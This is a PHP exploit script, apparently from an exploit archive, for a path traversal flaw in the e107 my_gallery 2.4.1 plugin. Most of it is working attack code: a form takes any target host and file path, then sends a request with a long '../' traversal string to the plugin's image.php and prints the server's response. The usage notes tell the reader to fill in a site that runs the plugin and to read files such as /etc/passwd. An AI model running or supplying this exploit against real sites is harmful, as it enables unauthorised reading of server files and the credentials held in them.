<?php /* ============================================ [o] e107 Plugin my_gallery 2.4.1 Exploit [o] ============================================ Bug [f]ound by NoGe - noge.code@gmail.com Exploit [c]oded by Vrs-hCk - d00r@telkom.net * Plugin my_gallery create photo gallery. * Powered by Highslide JS script. * With random gallery menu and navigation menu. * Has a comment system, ratings and search of images. Download e107 my_gallery 2.4.1 Plugin http://code.google.com/p/e107mygalleryplugin/downloads/list ============= [o] Usage [o] ============= Web 2 XPL << fill with site who use e107 Plugin my_gallery File 2 Read << fill with file or directory you want to read Web 2 XPL : www.contoh.com File 2 Read : /etc/passwd Then Go!!! ============== [o] Greetz [o] ============== MainHack BrotherHood [ http://news.serverisdown.org ] Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 Angela Zhang H312Y yooogy mousekill }^-^{ loqsa zxvf martfella skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke FUCK TERORIS!! */ $vuln = '/e107_plugins/my_gallery/image.php?file='; $trasv = '/../../../../../../../../../../../../../../..'; echo "<form method=POST> Web 2 XPL : <input type=\"text\" name=\"host\" size=30> File 2 Read : <input type=\"text\" name=\"file\" size=30> <input type=submit value=\"Go!!!\" name=\"_xpl\"> <br><br>"; if ($_POST['_xpl']) { $data .= "GET /{$vuln}{$trasv}{$file} HTTP/1.1\r\n"; $data .= "Host: {$host}\r\n"; $data .= "Connection: close\r\n\r\n"; $html = sendpacket($host,$data); print '<pre>'.htmlspecialchars($html).'</pre>'; } echo "</form>"; function sendpacket($host,$data) { if (!$sock = @fsockopen($host,80)) { die("[!] Connection refused, try again!\n"); } fputs($sock,$data); while (!feof($sock)) { $html .= fgets($sock); } fclose($sock); return $html; } ?> # sebug.net
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